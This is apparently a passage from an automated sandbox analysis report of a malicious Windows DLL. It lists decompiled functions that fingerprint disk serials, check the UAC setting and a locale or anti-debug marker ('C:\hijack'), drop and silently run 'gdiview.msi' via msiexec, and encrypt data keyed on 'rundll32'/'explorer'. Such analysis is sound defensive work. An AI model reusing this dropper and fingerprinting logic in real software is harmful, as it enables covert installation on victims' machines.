0x1001d71d
0x1001d727
0x1001d731
0x1001d73d
0x1001d743
0x1001d75a
0x1001d769
0x1001d779
0x1001d784
0x1001d78d
0x1001d790
0x1001d793
0x00000000
0x1001d795
0x1001d7a1
0x1001d7aa
0x1001d7b0
0x1001d7b0
0x1001d76b
0x00000000
0x1001d76b
0x1001d7ba
0x1001d7c0
0x1001d7ca
0x00000000
0x1001d7cc
0x00000000
0x1001d7cc
0x00000000
0x1001d7ca
0x1001d79d
0x00000000
0x00000000
0x1001d79f
0x00000000
0x1001d79d
0x1001d7fe
0x1001d802
0x1001d80b
0x00000000
0x1001d80b
0x1001d7f4
0x1001d7f4
0x00000000
0x1001d7f4
0x1001d80e
0x1001d814
0x1001d81a
0x1001d81d
0x1001d830

APIs

wsprintfW.USER32 ref: 1001D5F1
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D610
_memset.LIBCMT ref: 1001D645
DeviceIoControl.KERNEL32 ref: 1001D6C0
CloseHandle.KERNEL32(000000FF), ref: 1001D802

Strings

SCSI, xrefs: 1001D64D
\\.\Scsi%d:, xrefs: 1001D5E5
z, xrefs: 1001D7B0
DISK, xrefs: 1001D657

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseControlCreateDeviceFileHandle_memsetwsprintf
String ID: DISK$SCSI$\\.\Scsi%d:$z
API String ID: 3873020565-153650326
Opcode ID: 90ef5bbd0890bfc1898be704e586c13b7574c8df0df48dfabe30e792a59f74e8
Instruction ID: 864252d3b8c7652c0464aea4c6b0448db3b04a664ea9bb53ad0bcbd264417217
Opcode Fuzzy Hash: 90ef5bbd0890bfc1898be704e586c13b7574c8df0df48dfabe30e792a59f74e8
Instruction Fuzzy Hash: 30614AB4D04259DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB280DB759AC4CF85

Uniqueness

Uniqueness Score: -1.00%

Function 1001A4E0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1001A4E0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char* _a4) {
				signed int _v8;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				void* __ebp;
				void* _t36;
				void* _t75;
				void* _t80;
				void* _t81;

				_t74 = __esi;
				_t73 = __edi;
				_t57 = __ebx;
				_v8 = 0;
				_v176 = L1000CEAF(__ebx, __edx, __edi, __esi, 0x10);
				_v168 = L1000CEAF(__ebx, __edx, __edi, __esi, 0x21);
				E1000CF80(__edi, _v168, 0, 0x21);
				E1000CF80(_t73, _v176, 0, 0x10);
				_t67 = _a4;
				_t36 = E1000CAD0(_a4);
				_t80 = _t75 + 0x24;
				if(_t36 <= 0) {
					E1000E2E0(_v168, "00000000000000000000000000000000");
					_t81 = _t80 + 8;
				} else {
					E1001BC70( &_v164);
					E1001CB20( &_v164, _a4, E1000CAD0(_a4));
					_t67 =  &_v164;
					E1001CC20( &_v164, _v176);
					_t81 = _t80 + 0x1c;
					_v8 = 0;
					while(_v8 < 0x10) {
						_t67 = _v168 + _v8 * 2;
						E1000CCA3(_t73, _v168 + _v8 * 2, "%02X",  *(_v176 + _v8) & 0xff);
						_t81 = _t81 + 0xc;
						_v8 = _v8 + 1;
					}
				}
				_push(_v176);
				E1000CA40(_t57, _t73, _t74, __eflags);
				_v172 = L1000CEAF(_t57, _t67, _t73, _t74, 0x11);
				E1000CF80(_t73, _v172, 0, 0x11);
				__eflags = _v168 + 8;
				E1000D1F0(_t57, _t73, _t74, _v172, _v168 + 8, 0x10);
				_push(_v168);
				E1000CA40(_t57, _t73, _t74, __eflags);
				return _v172;
			}

APIs

_memset.LIBCMT ref: 1001A51B
_memset.LIBCMT ref: 1001A52E
_strlen.LIBCMT ref: 1001A53A
_strlen.LIBCMT ref: 1001A55D

Part of subcall function 1001CB20: und_memcpy.LIBCMTD ref: 1001CB9C
Part of subcall function 1001CB20: und_memcpy.LIBCMTD ref: 1001CC11

_sprintf.LIBCMT ref: 1001A5CC
_strcat.LIBCMT ref: 1001A5E4
_memset.LIBCMT ref: 1001A616

Strings

00000000000000000000000000000000, xrefs: 1001A5D8
%02X, xrefs: 1001A5BA

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_strlenund_memcpy$_sprintf_strcat
String ID: %02X$00000000000000000000000000000000
API String ID: 796335831-606320477
Opcode ID: 60a3efe95e7a99799e389f975f9b0388983824a41eb2a0a313478185e6d091f1
Instruction ID: 0e7775b8e07c3591b5db09e074d1c70b9db2800ece633bf375f61c4185d71463
Opcode Fuzzy Hash: 60a3efe95e7a99799e389f975f9b0388983824a41eb2a0a313478185e6d091f1
Instruction Fuzzy Hash: B23131B9E0031CAFEB10D760DC42F9E7775DB85304F0444A4F5496B246EA71AA949B93

Uniqueness

Uniqueness Score: -1.00%

Function 1001FCD0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001FCD0(void* __edi, void* __eflags) {
				char _v1027;
				char _v1028;
				char _v1291;
				char _v1292;
				int _t21;

				_t29 = __edi;
				_v1292 = 0;
				E1000CF80(__edi,  &_v1291, 0, 0x103);
				_v1028 = 0;
				E1000CF80(_t29,  &_v1027, 0, 0x3ff);
				GetTempPathA(0x104,  &_v1292);
				E1000CDB3( &_v1292,  &_v1292, 0x104, "gdiview.msi");
				E1000CCA3(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292);
				E1001FC70( &_v1292, 0x10027948, 0x39e00);
				_t21 = PathFileExistsA( &_v1292);
				_t38 = _t21;
				if(_t21 != 0) {
					return E1001A230(_t38,  &_v1028);
				}
				return _t21;
			}

0x1001fcd0
0x1001fcd9
0x1001fcee
0x1001fcf6
0x1001fd0b
0x1001fd1f
0x1001fd36
0x1001fd51
0x1001fd6a
0x1001fd79
0x1001fd7f
0x1001fd81
0x00000000
0x1001fd8f
0x1001fd95

APIs

_memset.LIBCMT ref: 1001FCEE
_memset.LIBCMT ref: 1001FD0B
GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FD1F
_strcat_s.LIBCMT ref: 1001FD36
_sprintf.LIBCMT ref: 1001FD51

Part of subcall function 1001FC70: CreateFileA.KERNEL32(10027948,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC93
Part of subcall function 1001FC70: WriteFile.KERNEL32(00039E00,00000000,00000000,10027948,00000000), ref: 1001FCAE
Part of subcall function 1001FC70: CloseHandle.KERNEL32(00039E00), ref: 1001FCC3

PathFileExistsA.SHLWAPI(00000000), ref: 1001FD79

Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A245
Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A269
Part of subcall function 1001A230: CreateProcessA.KERNEL32(00000000,1001FD8F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A28B
Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A299
Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A2A3

Strings

msiexec.exe /i "%s", xrefs: 1001FD45
gdiview.msi, xrefs: 1001FD25

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
String ID: gdiview.msi$msiexec.exe /i "%s"
API String ID: 1459467440-729886463
Opcode ID: 638d147b60cdaad351f02d20a3a99ddd6a7d58331e397eb4a17339b0ef9d2ce5
Instruction ID: 3bad07f9b44ae76435dc987b8054c1e75e99d3347c25e4cce5c64bbb1e3e6184
Opcode Fuzzy Hash: 638d147b60cdaad351f02d20a3a99ddd6a7d58331e397eb4a17339b0ef9d2ce5
Instruction Fuzzy Hash: 651170B9D0021866E710D7A0AC46FEE73389B14705F4404E4EB48A5181EFB5A7C88F91

Uniqueness

Uniqueness Score: -1.00%

Function 100206B5, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E100206B5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t31;
				void* _t35;
				void* _t47;
				void* _t49;
				intOrPtr _t51;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;

				_t62 = __eflags;
				_t45 = __esi;
				_t44 = __edi;
				_t36 = __ebx;
				E1001FE40();
				E10020020(__ebx, __edi, __esi, __eflags, "install", "installp3", "-0.35", "52.0", "exe");
				_t51 = _t49 + 0x14 - 0x1c;
				_t37 = _t51;
				 *((intOrPtr*)(_t47 - 0x248)) = _t51;
				 *((intOrPtr*)(_t47 - 0x260)) = E10001160(_t51, __eflags, "status=main_start");
				E100202C0(__ebx, __edi, __esi, _t62);
				_t52 = _t51 + 0x1c;
				if(PathFileExistsA("C:\\hijack") != 0) {
					L7:
					_t53 = _t52 - 0x1c;
					 *((intOrPtr*)(_t47 - 0x24c)) = _t53;
					 *((intOrPtr*)(_t47 - 0x264)) = E10001160(_t53, __eflags, "status=check_debug");
					E100202C0(_t36, _t44, _t45, __eflags);
					_t55 = _t53 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x250)) = _t55;
					 *((intOrPtr*)(_t47 - 0x268)) = E10001160(_t55, __eflags, "installp3");
					E1001FF30(_t36, _t44, _t45, __eflags);
					_t57 = _t55 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x254)) = _t57;
					 *((intOrPtr*)(_t47 - 0x26c)) = E10001160(_t57, __eflags, "installp3");
					E1001FE50(_t36, _t44, _t45, __eflags);
					_t59 = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x258)) = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x270)) = E10001160(_t59, __eflags, "status=main_over");
					E100202C0(_t36, _t44, _t45, __eflags);
				} else {
					E1001A100();
					if(E1001A110(_t37) == 0 || E10019D70() != 0) {
					} else {
						_t35 = E1001FA90(_t36, _t44, _t45, __eflags, 0x3e8, 0);
						_t52 = _t52 + 8;
						__eflags = _t35;
						if(__eflags != 0) {
							goto L7;
						} else {
						}
					}
				}
				E1001A2C0();
				 *((intOrPtr*)(_t47 - 0x25c)) = 1;
				 *((intOrPtr*)(_t47 - 4)) = 0xffffffff;
				E100011A0(_t47 - 0x28);
				_t31 =  *((intOrPtr*)(_t47 - 0x25c));
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t31;
			}

0x100206b5
0x100206b5
0x100206b5
0x100206b5
0x10020784
0x100207a2
0x100207aa
0x100207ad
0x100207af
0x100207bf
0x100207c5
0x100207ca
0x100207da
0x10020810
0x10020810
0x10020815
0x10020825
0x1002082b
0x10020833
0x10020838
0x10020848
0x1002084e
0x10020856
0x1002085b
0x1002086b
0x10020871
0x10020879
0x1002087e
0x1002088e
0x10020894
0x100207dc
0x100207dc
0x100207e8
0x100207f8
0x100207ff
0x10020804
0x10020807
0x10020809
0x00000000
0x00000000
0x1002080b
0x10020809
0x100207e8
0x1002089c
0x100208a1
0x100208ab
0x100208b5
0x100208ba
0x100208c3
0x100208ce

APIs

PathFileExistsA.SHLWAPI(C:\hijack), ref: 100207D2

Part of subcall function 10019D70: GetSystemDefaultLCID.KERNEL32 ref: 10019D7D

Strings

status=main_start, xrefs: 100207B5
installp3, xrefs: 10020798
install, xrefs: 1002079D
C:\hijack, xrefs: 100207CD
exe, xrefs: 10020789
-0.35, xrefs: 10020793
52.0, xrefs: 1002078E

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: DefaultExistsFilePathSystem
String ID: -0.35$52.0$C:\hijack$exe$install$installp3$status=main_start
API String ID: 482051434-415540327
Opcode ID: c7bb53ba4fc21687ef8e97688a6e24daaa9a5615d23e6718e289a260fe55cf78
Instruction ID: e003e7f35ba5866a000e498437e0e668718e67fe90f99aaae667264ec9ba667f
Opcode Fuzzy Hash: c7bb53ba4fc21687ef8e97688a6e24daaa9a5615d23e6718e289a260fe55cf78
Instruction Fuzzy Hash: 1A01D638D043055ED710FBA4AC4A6DE77A3DF41290F9401A9FA0467243EF31A5808AA2

Uniqueness

Uniqueness Score: -1.00%

Function 1002199A, Relevance: 13.6, APIs: 9, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1002199A(void* __ebx, void* __edx, void* __edi) {
				void* _t60;
				void* _t80;
				void* _t101;
				void* _t154;
				void* _t156;
				void* _t158;
				void* _t171;

				L0:
				while(1) {
					L0:
					_t150 = __edi;
					_t106 = __ebx;
					 *((intOrPtr*)(_t154 - 0xe2e0)) =  *((intOrPtr*)(_t154 - 0xe2e0)) + 1;
					_t60 = E10002270(_t154 - 0xe2a4);
					_t174 =  *((intOrPtr*)(_t154 - 0xe2e0)) - _t60;
					if( *((intOrPtr*)(_t154 - 0xe2e0)) >= _t60) {
						break;
					}
					L2:
					E1000CF80(__edi, _t154 - 0xab84, 0, 0x3710);
					E1000CF80(_t150, _t154 - 0x3d54, 0, 0x3710);
					_t80 = E10001A50(E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=");
					_t151 = _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0))));
					E1000D1F0(__ebx, _t150, _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t154 - 0xab84, E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))));
					E1000D903( *((intOrPtr*)(_t154 - 0xe2e0)), _t154 - 0x3d54, 0x3710, E10001A50(E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=") + 1);
					E1000CF80(_t150, _t154 - 0xe294, 0, 0x3710);
					E1000CF80(_t150, _t154 - 0x746c, 0, 0x3710);
					E1000CCA3(_t150, _t154 - 0xe294,  *((intOrPtr*)(_t154 - 0x3d58)), _t154 - 0xab84);
					_push(_t154 - 0x3d54);
					_push(_t154 - 0xe294);
					_push( *((intOrPtr*)(_t154 + 8)));
					E1000CCA3(_t150, _t154 - 0x746c,  *((intOrPtr*)(_t154 - 0x7470)),  *((intOrPtr*)(_t154 - 0x18)));
					_t171 = _t156 + 0x7c;
					if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
						E1000D1F0(_t106, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x746c, E1000CAD0(_t154 - 0x746c));
						_t171 = _t171 + 0x10;
					}
					_t101 = E1000CAD0(_t154 - 0x746c);
					_t156 = _t171 + 4;
					 *((intOrPtr*)(_t154 - 0x14)) = _t101 +  *((intOrPtr*)(_t154 - 0x14));
				}
				L5:
				 *((char*)(_t154 - 4)) = 1;
				E100011A0(_t154 - 0xe2dc);
				 *((char*)(_t154 - 4)) = 0;
				E10003090(_t154 - 0xe2a4);
				 *((intOrPtr*)(_t154 - 4)) = 0xffffffff;
				E100011A0(_t154 - 0xe2c0);
				 *(_t154 - 0x10) = "\r\n%s%s%s\r\n";
				 *((char*)(_t154 - 0x21c)) = 0;
				E1000CF80(__edi, _t154 - 0x21b, 0, 0x1ff);
				_push( *((intOrPtr*)(_t154 - 0x18)));
				_push( *((intOrPtr*)(_t154 + 8)));
				E1000CCA3(_t150, _t154 - 0x21c,  *(_t154 - 0x10),  *((intOrPtr*)(_t154 - 0x18)));
				_t158 = _t156 + 0x20;
				if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
					E1000D1F0(__ebx, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x21c, E1000CAD0(_t154 - 0x21c));
					_t158 = _t158 + 0x10;
				}
				 *((intOrPtr*)(_t154 - 0x14)) = E1000CAD0(_t154 - 0x21c) +  *((intOrPtr*)(_t154 - 0x14));
				 *[fs:0x0] =  *((intOrPtr*)(_t154 - 0xc));
				return  *((intOrPtr*)(_t154 - 0x14));
			}

APIs

_memset.LIBCMT ref: 100219CE
_memset.LIBCMT ref: 100219E4
_strcpy_s.LIBCMT ref: 10021A91
_memset.LIBCMT ref: 10021AA7
_memset.LIBCMT ref: 10021ABD
_sprintf.LIBCMT ref: 10021ADA
_sprintf.LIBCMT ref: 10021B06

Part of subcall function 1000CCA3: __output_l.LIBCMT ref: 1000CCF6

_strlen.LIBCMT ref: 10021B1D
_strlen.LIBCMT ref: 10021B45
_memset.LIBCMT ref: 10021BA4
_sprintf.LIBCMT ref: 10021BC3
_strlen.LIBCMT ref: 10021BDA
_strlen.LIBCMT ref: 10021C02

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_strlen$_sprintf$__output_l_strcpy_s
String ID:
API String ID: 3854912713-0
Opcode ID: ce6b15c3fcdaa56ceb52cb1d185c127a632914fc5c4c1566f2125b128dce72e4
Instruction ID: 1147c12dce7df64e2ed4ffc9360bb1615f7fbc1f7e9a2ddb3abdd0b7a3fb9a22
Opcode Fuzzy Hash: ce6b15c3fcdaa56ceb52cb1d185c127a632914fc5c4c1566f2125b128dce72e4
Instruction Fuzzy Hash: 6B41A6B6D001186BDB14D7A0DC92EEE737DEF04240F0448A5F50DB6246EB757B488BA2

Uniqueness

Uniqueness Score: -1.00%

Function 10022530, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10022530(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v36;
				char _v292;
				signed int _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				intOrPtr _v312;
				void* __ebp;
				char _t61;
				char _t62;
				signed int _t70;
				intOrPtr _t102;
				intOrPtr _t103;
				char _t115;
				char _t116;
				signed int _t118;

				_t132 = __esi;
				_t131 = __edi;
				_t101 = __ebx;
				_t61 = "rundll32"; // 0x646e7572
				_v24 = _t61;
				_t102 =  *0x100264e4; // 0x32336c6c
				_v20 = _t102;
				_t115 =  *0x100264e8; // 0x0
				_v16 = _t115;
				_t62 = "explorer"; // 0x6c707865
				_v308 = _t62;
				_t103 =  *0x100264f0; // 0x7265726f
				_v304 = _t103;
				_t116 =  *0x100264f4; // 0x0
				_v300 = _t116;
				E1000CF80(__edi,  &_v292, 0, 0x108);
				E1001F1B0( &_v24,  &_v292,  &_v24);
				E1000D1F0(__ebx, _t131, __esi,  &_v36,  &_v308, 8);
				_t118 = _a4;
				_v12 = E1000CAD0(_t118);
				_v296 = 0;
				_t70 = _v12 & 0x80000007;
				if(_t70 < 0) {
					_t70 = (_t70 - 0x00000001 | 0xfffffff8) + 1;
				}
				if(_t70 == 0) {
					_t120 = _v12 + 8;
					__eflags = _t120;
					_v296 = _t120;
				} else {
					asm("cdq");
					_t120 = _t118 & 0x00000007;
					_v296 = 8 + (_v12 + (_t118 & 0x00000007) >> 3) * 8;
				}
				_v8 = L1000CEAF(_t101, _t120, _t131, _t132, _v296);
				E1000CF80(_t131, _v8, 0, _v296);
				E1000D1F0(_t101, _t131, _t132, _v8, _a4, E1000CAD0(_a4));
				E1001F110(_t101, _v8, _t131, _t132,  &_v292, _v8, _v8, _v296);
				asm("cdq");
				_v312 = L1000CEAF(_t101, 1 + (_v296 + 2) / 3 * 4, _t131, _t132, 1 + (_v296 + 2) / 3 * 4);
				asm("cdq");
				E1000CF80(_t131, _v312, 0, 1 + (_v296 + 2) / 3 * 4);
				_t90 = _v296 + 2;
				asm("cdq");
				E1001F2A0(_v312, 1 + (_v296 + 2) / 3 * 4, _v8, _v296);
				_push(_v8);
				E1000CA40(_t101, _t131, _t132, _t90 % 3);
				return _v312;
			}

APIs

_memset.LIBCMT ref: 10022584
_strlen.LIBCMT ref: 100225B8
_memset.LIBCMT ref: 10022626
_strlen.LIBCMT ref: 10022632
_memset.LIBCMT ref: 100226B2

Strings

explorer, xrefs: 10022553
rundll32, xrefs: 10022539

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_strlen
String ID: explorer$rundll32
API String ID: 1975251954-2912785976
Opcode ID: 47feec5f4e07d9a8727310987636f621792a510bfb959471694aa5da43594d6a
Instruction ID: dabab85bc6ef052ed749d04d1e93e2dad56e743369109b7e858dc002110f0523
Opcode Fuzzy Hash: 47feec5f4e07d9a8727310987636f621792a510bfb959471694aa5da43594d6a
Instruction Fuzzy Hash: 9A516DBAD00218ABDB14DB98DC92FDE73B9EB4C304F044199E54997341EA31FB54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1001DC60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001DC60(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				struct _OSVERSIONINFOW _v284;
				char _v547;
				char _v548;
				char _v819;
				char _v820;
				char _v824;
				void* _t31;
				void* _t38;
				void* _t41;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t53;
				void* _t57;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t69 = __esi;
				_t68 = __edi;
				_t57 = __ebx;
				if(_a4 == 0) {
					return _t31;
				}
				_v820 = 0;
				E1000CF80(__edi,  &_v819, 0, 0x103);
				_v548 = 0;
				_t58 =  &_v547;
				E1000CF80(_t68,  &_v547, 0, 0x103);
				_t65 =  &(_v284.dwMajorVersion);
				E1000CF80(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
				_t74 = _t71 + 0x24;
				_v284.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v284);
				if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2 || E1001D2A0() == 0) {
					_t38 = E1001D840(_t68,  &_v548);
					_t75 = _t74 + 4;
					__eflags = _t38;
					if(_t38 != 0) {
						L11:
						E1001D330(_t58,  &_v548);
						_t65 =  &_v820;
						_t41 = E1001CD50( &_v820, 0x104,  &_v824);
						_t77 = _t75 + 0x10;
						__eflags = _t41;
						if(_t41 >= 0) {
							_t65 = 0x104 - _v824;
							__eflags = 0x104;
							E1001CCB0( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
							_t77 = _t77 + 0xc;
						}
						goto L13;
					}
					_t49 = E1001D5C0(_t68,  &_v548);
					_t75 = _t75 + 4;
					__eflags = _t49;
					if(_t49 != 0) {
						goto L11;
					}
					_t58 =  &_v548;
					_t50 = E1001DAD0(_t68,  &_v548);
					_t75 = _t75 + 4;
					__eflags = _t50;
					if(_t50 != 0) {
						goto L11;
					}
					_t65 =  &_v548;
					_t51 = E1001D3D0(_t57, _t68, _t69,  &_v548);
					_t77 = _t75 + 4;
					__eflags = _t51;
					if(_t51 == 0) {
						goto L13;
					}
					goto L11;
				} else {
					_t53 = E1001DAD0(_t68,  &_v548);
					_t77 = _t74 + 4;
					_t84 = _t53;
					if(_t53 != 0) {
						_t65 =  &_v548;
						E1001D330( &_v548,  &_v548);
						E1001D380(_t84,  &_v820,  &_v548);
						_t77 = _t77 + 0xc;
					}
					L13:
					if(_v820 == 0) {
						_t65 =  &_v820;
						E1001D000("Mid2Failed", 0x104,  &_v820);
						_t77 = _t77 + 0xc;
					}
					return E1000D903(_t65, _a4, 0x104,  &_v820);
				}
			}

0x1001dc60
0x1001dc60
0x1001dc60
0x1001dc6d
0x1001de14
0x1001de14
0x1001dc73
0x1001dc88
0x1001dc90
0x1001dc9e
0x1001dca5
0x1001dcb4
0x1001dcbb
0x1001dcc0
0x1001dcc3
0x1001dcd4
0x1001dce1
0x1001dd39
0x1001dd3e
0x1001dd41
0x1001dd43
0x1001dd7e
0x1001dd85
0x1001dd99
0x1001dda0
0x1001dda5
0x1001dda8
0x1001ddaa
0x1001ddbf
0x1001ddbf
0x1001ddcd
0x1001ddd2
0x1001ddd2
0x00000000
0x1001ddaa
0x1001dd4c
0x1001dd51
0x1001dd54
0x1001dd56
0x00000000
0x00000000
0x1001dd58
0x1001dd5f
0x1001dd64
0x1001dd67
0x1001dd69
0x00000000
0x00000000
0x1001dd6b
0x1001dd72
0x1001dd77
0x1001dd7a
0x1001dd7c
0x00000000
0x00000000
0x00000000
0x1001dcf5
0x1001dcfc
0x1001dd01
0x1001dd04
0x1001dd06
0x1001dd08
0x1001dd0f
0x1001dd25
0x1001dd2a
0x1001dd2a
0x1001ddd5
0x1001ddde
0x1001dde0
0x1001ddf1
0x1001ddf6
0x1001ddf6
0x00000000
0x1001de0e

APIs

_memset.LIBCMT ref: 1001DC88
_memset.LIBCMT ref: 1001DCA5
_memset.LIBCMT ref: 1001DCBB
GetVersionExW.KERNEL32(00000114), ref: 1001DCD4
_strcpy_s.LIBCMT ref: 1001DE09

Part of subcall function 1001D2A0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D2DE
Part of subcall function 1001D2A0: RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D2FF
Part of subcall function 1001D2A0: RegCloseKey.ADVAPI32(00000000), ref: 1001D319

Part of subcall function 1001DAD0: wsprintfW.USER32 ref: 1001DB1C
Part of subcall function 1001DAD0: CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DB38
Part of subcall function 1001DAD0: _memset.LIBCMT ref: 1001DB81
Part of subcall function 1001DAD0: DeviceIoControl.KERNEL32 ref: 1001DBB0
Part of subcall function 1001DAD0: _memset.LIBCMT ref: 1001DBC8
Part of subcall function 1001DAD0: CloseHandle.KERNEL32(000000FF), ref: 1001DC14

Part of subcall function 1001D330: _strlen.LIBCMT ref: 1001D33E

Strings

Mid2Failed, xrefs: 1001DDEC

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$Close$ControlCreateDeviceFileHandleOpenQueryValueVersion_strcpy_s_strlenwsprintf
String ID: Mid2Failed
API String ID: 2934472556-1001836097
